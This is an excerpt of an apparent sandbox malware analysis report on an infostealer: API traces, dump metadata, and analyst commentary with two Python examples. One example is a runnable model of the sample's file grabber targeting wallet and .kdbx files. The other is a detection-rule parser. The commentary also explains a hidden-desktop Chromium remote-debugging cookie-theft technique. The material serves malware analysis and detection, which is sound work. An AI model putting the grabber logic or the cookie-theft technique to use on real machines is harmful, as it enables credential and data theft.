                              • Part of subcall function 008FCCD0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 008FCD36
                              • Part of subcall function 008FCCD0: lstrcpyn.KERNEL32(?,?,00000104), ref: 008FCDB9
                            • CoUninitialize.COMBASE ref: 008FCEF9
                            • lstrcat.KERNEL32(?,?), ref: 008FCF1E
                            • lstrlen.KERNEL32(?), ref: 008FCF2B
                            • StrCmpCA.SHLWAPI(?,0090CFF4), ref: 008FCF45
                            • wsprintfA.USER32 ref: 008FCF6D
                            • wsprintfA.USER32 ref: 008FCF8C
                            • PathMatchSpecA.SHLWAPI(?,?), ref: 008FCFA0
                            • wsprintfA.USER32 ref: 008FCFC8
                            • CopyFileA.KERNEL32(?,?,00000001), ref: 008FCFE1
                            • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 008FD000
                            • GetFileSizeEx.KERNEL32(00000000,?), ref: 008FD018
                            • CloseHandle.KERNEL32(00000000), ref: 008FD023
                            • CloseHandle.KERNEL32(00000000), ref: 008FD02F
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008FD044
                            • lstrcpy.KERNEL32(00000000,?), ref: 008FD084
                            • FindNextFileA.KERNEL32(?,?), ref: 008FD17D
                            • FindClose.KERNEL32(?), ref: 008FD18F
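The call sequence in this record is the shape of a recursive file grabber: wsprintfA builds "<dir>\*", FindFirstFileA/FindNextFileA enumerate it, the two StrCmpCA calls skip "." and "..", wsprintfA("%s\%s") forms the entry path, PathMatchSpecA tests the name against a wildcard mask, CreateFileA with GENERIC_READ (0x80000000) and OPEN_EXISTING (3) followed by GetFileSizeEx reads the size, and CopyFileA with bFailIfExists=1 copies the hit to a path built with "%s\%s\%s". The Python model below is an added example written for this report; it is not the sample's code and not a decompilation, and the mask list, the size cap and the recursion limit are assumptions chosen for illustration. It reproduces only the order of operations, with os.listdir standing in for the Find* loop and fnmatch for PathMatchSpecA.

```python
import fnmatch
import os
import shutil
import tempfile
from dataclasses import dataclass

# Assumed mask list and size cap. The real values come from the stealer's
# configuration and are not visible in the trace; these are for illustration.
DEFAULT_MASKS = ("*.txt", "*wallet*", "*.kdbx")
MAX_SIZE = 64 * 1024


@dataclass
class Hit:
    src: str
    dst: str
    size: int


def path_match_spec(name: str, masks) -> bool:
    """Stand-in for PathMatchSpecA: wildcard match, case-insensitive on both
    sides (fnmatch.fnmatchcase is case-sensitive on every OS, so lower first)."""
    low = name.lower()
    return any(fnmatch.fnmatchcase(low, mask.lower()) for mask in masks)


def grab(root, dest, masks=DEFAULT_MASKS, max_size=MAX_SIZE, depth=0, max_depth=8):
    """One directory level of the walk seen in the trace:
    wsprintfA("%s\\*")          -> list the directory
    StrCmpCA(".") / ("..")      -> skip the two pseudo-entries
    wsprintfA("%s\\%s")         -> full path of the entry; recurse if directory
    PathMatchSpecA(name, mask)  -> keep only matching files
    CreateFileA + GetFileSizeEx -> size check
    wsprintfA("%s\\%s\\%s")     -> destination path; CopyFileA(bFailIfExists=1)
    The recursion limit is an assumption; the trace shows none."""
    hits = []
    if depth > max_depth:
        return hits
    try:
        entries = os.listdir(root)  # FindFirstFileA("<root>\\*") ... FindNextFileA loop
    except OSError:
        return hits
    for name in entries:
        if name in (".", ".."):  # os.listdir never yields these; kept to mirror the StrCmpCA pair
            continue
        full = os.path.join(root, name)
        if os.path.isdir(full):
            hits.extend(grab(full, os.path.join(dest, name), masks, max_size, depth + 1, max_depth))
            continue
        if not path_match_spec(name, masks):
            continue
        size = os.path.getsize(full)
        if size > max_size:
            continue
        dst = os.path.join(dest, name)
        if os.path.exists(dst):  # CopyFileA with bFailIfExists=TRUE does not overwrite
            continue
        os.makedirs(dest, exist_ok=True)
        shutil.copyfile(full, dst)
        hits.append(Hit(full, dst, size))
    return hits


def demo():
    """Runs the walk over a constructed tree and returns the relative paths it copied."""
    with tempfile.TemporaryDirectory() as td:
        src = os.path.join(td, "src")
        os.makedirs(os.path.join(src, "sub"))
        files = {"notes.txt": b"a", "skip.exe": b"b",
                 "sub/WALLET.dat": b"c" * 10, "sub/big.txt": b"d" * (MAX_SIZE + 1)}
        for rel, body in files.items():
            with open(os.path.join(src, *rel.split("/")), "wb") as f:
                f.write(body)
        hits = grab(src, os.path.join(td, "out"))
        return sorted(os.path.relpath(h.src, src).replace(os.sep, "/") for h in hits)


if __name__ == "__main__":
    print(demo())
```

The point of the model is the ordering: the size check happens after the mask match and before the copy, which is why GetFileSizeEx sits between PathMatchSpecA and CopyFileA in the trace, and bFailIfExists=1 means a second pass over the same tree is a no-op rather than an overwrite.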
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filewsprintf$CloseFind$CreateHandleMatchPathSpeclstrcat$ByteCharCopyFirstInitializeInstanceMultiNextSizeUninitializeUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpylstrcpynlstrlen
                            • String ID: %s%s$%s\%s$%s\%s\%s$%s\*
                            • API String ID: 3860919712-2388001722
                            • Opcode ID: 8ed4afde58f807619640b94feefac71c0abe8b7c88dbb9167e6f705143d534c6
                            • Instruction ID: ce36d06368393dbea7448348a1445e0938b48711875d0a51107d290d298281f7
                            • Opcode Fuzzy Hash: 8ed4afde58f807619640b94feefac71c0abe8b7c88dbb9167e6f705143d534c6
                            • Instruction Fuzzy Hash: D4C1517190025DABDB20DF64DC89EEE777AFF88304F408599F609E7290EE709A85CB51
                            APIs
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008F13E1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F1404
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008F140F
                            • lstrlen.KERNEL32(00914CAC), ref: 008F141A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F1437
                            • lstrcat.KERNEL32(00000000,00914CAC), ref: 008F1443
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F146E
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 008F148A
                            • StrCmpCA.SHLWAPI(?,009117A8), ref: 008F14AC
                            • StrCmpCA.SHLWAPI(?,009117AC), ref: 008F14C6
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008F14FF
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F1527
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008F1532
                            • lstrlen.KERNEL32(0091179C), ref: 008F153D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F155A
                            • lstrcat.KERNEL32(00000000,0091179C), ref: 008F1566
                            • lstrlen.KERNEL32(?), ref: 008F1573
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F1593
                            • lstrcat.KERNEL32(00000000,?), ref: 008F15A1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F15CA
                            • StrCmpCA.SHLWAPI(?,012FDF20), ref: 008F15F3
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F1634
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F165D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F1685
                            • StrCmpCA.SHLWAPI(?,012FE0A0), ref: 008F16A2
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F16E3
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F170C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F1734
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F18E6
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F190E
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F1945
                            • FindNextFileA.KERNEL32(00000000,?), ref: 008F196C
                            • FindClose.KERNEL32(00000000), ref: 008F197B
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                            • String ID:
                            • API String ID: 1346933759-0
                            • Opcode ID: c2691fac117b91a9451dcc973398b08cd91b2a13ede338da67e0cfa362987c4c
                            • Instruction ID: 7c384b748b863cc053738c86928494abaf3b863ace5b7ca2ab283d4efedf33e0
                            • Opcode Fuzzy Hash: c2691fac117b91a9451dcc973398b08cd91b2a13ede338da67e0cfa362987c4c
                            • Instruction Fuzzy Hash: B6C19A31A1025AABCF21AF79DC8DAAE7BB8FF45300F444128B946E7251DF74DD418B91
                            APIs
                            • memset.MSVCRT ref: 008E9790
                            • lstrcat.KERNEL32(?,?), ref: 008E97A0
                            • lstrcat.KERNEL32(?,?), ref: 008E97B1
                            • lstrcat.KERNEL32(?, --remote-debugging-port=9229 --profile-directory="), ref: 008E97C3
                            • memset.MSVCRT ref: 008E97D7
                              • Part of subcall function 00904040: lstrcpy.KERNEL32(00000000,0090CFF4), ref: 00904075
                              • Part of subcall function 00904040: lstrcpy.KERNEL32(00000000,012FED98), ref: 0090409F
                              • Part of subcall function 00904040: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,008E134E,?,0000001A), ref: 009040A9
                            • wsprintfA.USER32 ref: 008E9806
                            • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 008E9827
                            • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 008E9844
                              • Part of subcall function 009048B0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 009048C9
                              • Part of subcall function 009048B0: Process32First.KERNEL32(00000000,00000128), ref: 009048D9
                              • Part of subcall function 009048B0: Process32Next.KERNEL32(00000000,00000128), ref: 009048EB
                              • Part of subcall function 009048B0: StrCmpCA.SHLWAPI(?,?), ref: 009048FD
                              • Part of subcall function 009048B0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00904912
                              • Part of subcall function 009048B0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00904921
                              • Part of subcall function 009048B0: CloseHandle.KERNEL32(00000000), ref: 00904928
                              • Part of subcall function 009048B0: Process32Next.KERNEL32(00000000,00000128), ref: 00904936
                              • Part of subcall function 009048B0: CloseHandle.KERNEL32(00000000), ref: 00904941
                            • lstrcat.KERNEL32(00000000,?), ref: 008E9878
                            • lstrcat.KERNEL32(00000000,?), ref: 008E9889
                            • lstrcat.KERNEL32(00000000,00914B68), ref: 008E989B
                            • memset.MSVCRT ref: 008E98AF
                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 008E98D4
                            • lstrcpy.KERNEL32(00000000,?), ref: 008E9903
                            • StrStrA.SHLWAPI(00000000,012FF840), ref: 008E9919
                            • lstrcpyn.KERNEL32(00B193D0,00000000,00000000), ref: 008E9938
                            • lstrlen.KERNEL32(?), ref: 008E994B
                            • wsprintfA.USER32 ref: 008E995B
                            • lstrcpy.KERNEL32(?,00000000), ref: 008E9971
                            • Sleep.KERNEL32(00001388), ref: 008E99E7
                              • Part of subcall function 008E1530: lstrcpy.KERNEL32(00000000,?), ref: 008E1557
                              • Part of subcall function 008E1530: lstrcpy.KERNEL32(00000000,?), ref: 008E1579
                              • Part of subcall function 008E1530: lstrcpy.KERNEL32(00000000,?), ref: 008E159B
                              • Part of subcall function 008E1530: lstrcpy.KERNEL32(00000000,?), ref: 008E15FF
                              • Part of subcall function 008E92B0: strlen.MSVCRT ref: 008E92E1
                              • Part of subcall function 008E92B0: strlen.MSVCRT ref: 008E92FA
                              • Part of subcall function 008E92B0: strlen.MSVCRT ref: 008E9399
                              • Part of subcall function 008E92B0: strlen.MSVCRT ref: 008E93E6
                              • Part of subcall function 00904950: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00904969
                              • Part of subcall function 00904950: Process32First.KERNEL32(00000000,00000128), ref: 00904979
                              • Part of subcall function 00904950: Process32Next.KERNEL32(00000000,00000128), ref: 0090498B
                              • Part of subcall function 00904950: OpenProcess.KERNEL32(00000001,00000000,?), ref: 009049AC
                              • Part of subcall function 00904950: TerminateProcess.KERNEL32(00000000,00000000), ref: 009049BB
                              • Part of subcall function 00904950: CloseHandle.KERNEL32(00000000), ref: 009049C2
                              • Part of subcall function 00904950: Process32Next.KERNEL32(00000000,00000128), ref: 009049D0
                              • Part of subcall function 00904950: CloseHandle.KERNEL32(00000000), ref: 009049DB
                            • CloseDesktop.USER32(?), ref: 008E9A1C
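This record is the most security-relevant one in the section. The routine concatenates a command line ending in --remote-debugging-port=9229 --profile-directory=", opens or creates a separate desktop (CreateDesktopA with access 0x10000000, GENERIC_ALL), and the subcall at 009048B0 walks the process list with CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS), compares each name with StrCmpCA and kills matches via OpenProcess(PROCESS_TERMINATE)/TerminateProcess. SHGetFolderPathA is called with CSIDL 0x1C (CSIDL_LOCAL_APPDATA, where Chromium user data lives), Sleep(0x1388) waits 5000 ms, and CloseDesktop finishes. Starting a Chromium browser on a desktop the user cannot see with the DevTools remote-debugging port open is the known way stealers read cookies without touching the on-disk database; the DevTools exchange itself is not visible in this record, so treat that as the likely intent rather than observed behaviour. On a host, a chrome.exe or msedge.exe started with --remote-debugging-port by a non-browser parent is the high-signal check.

The following Python is an added example for this report, not Joe Sandbox code and not the sample's: it parses the "APIs" bullets exactly as they appear on this page (the direct calls, the "Part of subcall function" lines and the String ID of the Similarity block) and applies three behaviour rules that cover this record and the two earlier ones, the Firefox profile enumeration keyed on "prefs.js" and the PathMatchSpecA/CopyFileA grabber. The rule names and the trimmed SAMPLE text are this example's own constructions; the CSIDL table is from the Windows SDK.

```python
import re

# Constructed input: a trimmed copy of three API records from the report
# excerpt (Firefox profile enumeration, file grabber, hidden-desktop browser
# launch). The parser keys only on the "APIs" header, the bullet lines and
# "String ID", so the full report text can be fed in unchanged.
SAMPLE = """\
APIs
• lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008F4CB1
• lstrcat.KERNEL32(00000000,00914CAC), ref: 008F4D13
• FindFirstFileA.KERNEL32(00000000,?), ref: 008F4D5A
• String ID: prefs.js
APIs
• wsprintfA.USER32 ref: 008FCDEC
• FindFirstFileA.KERNEL32(?,?), ref: 008FCE03
• PathMatchSpecA.SHLWAPI(?,012F9350), ref: 008FCED2
• CopyFileA.KERNEL32(?,?,00000001), ref: 008FCFE1
• CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 008FD000
• GetFileSizeEx.KERNEL32(00000000,?), ref: 008FD018
• FindNextFileA.KERNEL32(?,?), ref: 008FD17D
• String ID: %s%s$%s\\%s$%s\\%s\\%s$%s\\*
APIs
• lstrcat.KERNEL32(?, --remote-debugging-port=9229 --profile-directory="), ref: 008E97C3
• CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 008E9844
• Part of subcall function 009048B0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00904912
• Part of subcall function 009048B0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00904921
• SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 008E98D4
• Sleep.KERNEL32(00001388), ref: 008E99E7
• CloseDesktop.USER32(?), ref: 008E9A1C
"""

# One report bullet: optional "Part of subcall function X:" prefix, api.MODULE,
# optional (args), then "ref: <addr>".
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>[A-Za-z_][\w$@?]*)\.(?P<mod>[A-Z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)


def parse_records(text):
    """Splits the text into records (one per 'APIs' header); each record keeps
    its (api, args, is_subcall) calls and the '$'-separated String IDs."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = {"calls": [], "strings": []}
            records.append(cur)
        elif cur is None:
            continue
        elif line.startswith("• String ID:"):
            cur["strings"] += [s for s in line.split(":", 1)[1].strip().split("$") if s]
        else:
            m = API_RE.match(line)
            if m:
                cur["calls"].append((m["api"], m["args"] or "", bool(m["sub"])))
    return records


def direct_apis(rec):
    return {api for api, _, sub in rec["calls"] if not sub}


def all_apis(rec):
    return {api for api, _, _ in rec["calls"]}


def mentions(rec, needle):
    return any(needle in args for _, args, _ in rec["calls"]) or any(needle in s for s in rec["strings"])


# Behaviour rules, one predicate per record. The names are this example's own
# labels, not Joe Sandbox signature names.
RULES = {
    # FindFirstFileA driven by the literal "prefs.js" (the per-profile Firefox
    # settings file): enumeration of Firefox profile directories.
    "firefox_profile_enumeration": lambda r: "FindFirstFileA" in direct_apis(r) and "prefs.js" in r["strings"],
    # Directory walk + wildcard match + copy: the grabber loop.
    "file_grabber": lambda r: {"FindFirstFileA", "PathMatchSpecA", "CopyFileA"} <= direct_apis(r),
    # DevTools flag on the command line, a new desktop to hide the window, and
    # a kill of the running browser (TerminateProcess reached through a subcall).
    "chromium_remote_debugging_hidden_desktop": lambda r: (
        mentions(r, "--remote-debugging-port") and "CreateDesktopA" in direct_apis(r)
        and "TerminateProcess" in all_apis(r)),
}

CSIDL_NAMES = {0x1A: "CSIDL_APPDATA", 0x1C: "CSIDL_LOCAL_APPDATA", 0x28: "CSIDL_PROFILE"}


def folder_targets(rec):
    """Decodes the nFolder argument of every SHGetFolderPathA call in a record."""
    names = []
    for api, args, _ in rec["calls"]:
        if api == "SHGetFolderPathA":
            field = args.split(",")[1] if "," in args else "?"
            names.append(CSIDL_NAMES.get(int(field, 16), field) if field != "?" else "?")
    return names


def classify(text):
    """Returns, per record, the sorted list of rule names that fired."""
    return [sorted(name for name, rule in RULES.items() if rule(r)) for r in parse_records(text)]


if __name__ == "__main__":
    for rec, labels in zip(parse_records(SAMPLE), classify(SAMPLE)):
        print(sorted(all_apis(rec)), labels, folder_targets(rec))
```

The third rule deliberately requires all three pieces (the flag, CreateDesktopA and TerminateProcess) because each on its own is common in benign software; the combination, in one function, is what distinguishes this routine from a browser updater or a test harness.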
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Process32lstrcat$Close$HandleNextProcessstrlen$CreateDesktopOpenmemset$FirstSnapshotTerminateToolhelp32wsprintf$FolderPathSleepSystemTimelstrcpynlstrlen
                            • String ID: --remote-debugging-port=9229 --profile-directory="$%s%s$D
                            • API String ID: 958055206-1862457068
                            • Opcode ID: 02a8bf7d09f25fa9f33425d72937df432a3342b435fa4b71cf661bd2d4586b37
                            • Instruction ID: 1c2ba2e96eb0bdae4c93a9869be54ba36f4f2bdf8f064d19a722de70b76e76f2
                            • Opcode Fuzzy Hash: 02a8bf7d09f25fa9f33425d72937df432a3342b435fa4b71cf661bd2d4586b37
                            • Instruction Fuzzy Hash: 8B917371A40258AFDB10DBA4DC89FDE77B8FF48700F5085A5F609E7291DEB0AA448B91
                            APIs
                            • wsprintfA.USER32 ref: 008FE40C
                            • FindFirstFileA.KERNEL32(?,?), ref: 008FE423
                            • StrCmpCA.SHLWAPI(?,009117A8), ref: 008FE443
                            • StrCmpCA.SHLWAPI(?,009117AC), ref: 008FE45D
                            • wsprintfA.USER32 ref: 008FE482
                            • StrCmpCA.SHLWAPI(?,0090CFF4), ref: 008FE494
                            • wsprintfA.USER32 ref: 008FE4B1
                              • Part of subcall function 008FEFC0: lstrcpy.KERNEL32(00000000,?), ref: 008FEFF2
                            • wsprintfA.USER32 ref: 008FE4D0
                            • PathMatchSpecA.SHLWAPI(?,?), ref: 008FE4E4
                            • lstrcat.KERNEL32(?,012FFC58), ref: 008FE515
                            • lstrcat.KERNEL32(?,0091179C), ref: 008FE527
                            • lstrcat.KERNEL32(?,?), ref: 008FE538
                            • lstrcat.KERNEL32(?,0091179C), ref: 008FE54A
                            • lstrcat.KERNEL32(?,?), ref: 008FE55E
                            • CopyFileA.KERNEL32(?,?,00000001), ref: 008FE574
                            • lstrcpy.KERNEL32(00000000,?), ref: 008FE5B2
                            • lstrcpy.KERNEL32(00000000,?), ref: 008FE602
                            • DeleteFileA.KERNEL32(?), ref: 008FE63C
                              • Part of subcall function 008E1530: lstrcpy.KERNEL32(00000000,?), ref: 008E1557
                              • Part of subcall function 008E1530: lstrcpy.KERNEL32(00000000,?), ref: 008E1579
                              • Part of subcall function 008E1530: lstrcpy.KERNEL32(00000000,?), ref: 008E159B
                              • Part of subcall function 008E1530: lstrcpy.KERNEL32(00000000,?), ref: 008E15FF
                            • FindNextFileA.KERNEL32(00000000,?), ref: 008FE67B
                            • FindClose.KERNEL32(00000000), ref: 008FE68A
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                            • String ID: %s\%s$%s\*
                            • API String ID: 1375681507-2848263008
                            • Opcode ID: 4af9adae5bc6397c6fda9a847b9bc055476f195a5fdb7fe2d170bdb6d5d30960
                            • Instruction ID: dee044776c69ef79353762501b97e90d7ede096973e0d3f9616280e93e4aa990
                            • Opcode Fuzzy Hash: 4af9adae5bc6397c6fda9a847b9bc055476f195a5fdb7fe2d170bdb6d5d30960
                            • Instruction Fuzzy Hash: 30815F7290025CABCB20EF74DC89AEE77B9FF58304F4089A8B509D3150EE74AA45CF91
                            APIs
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008E16E2
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008E1719
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E176C
                            • lstrcat.KERNEL32(00000000), ref: 008E1776
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E17A2
                            • lstrcpy.KERNEL32(00000000,?), ref: 008E18F3
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008E18FE
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmp
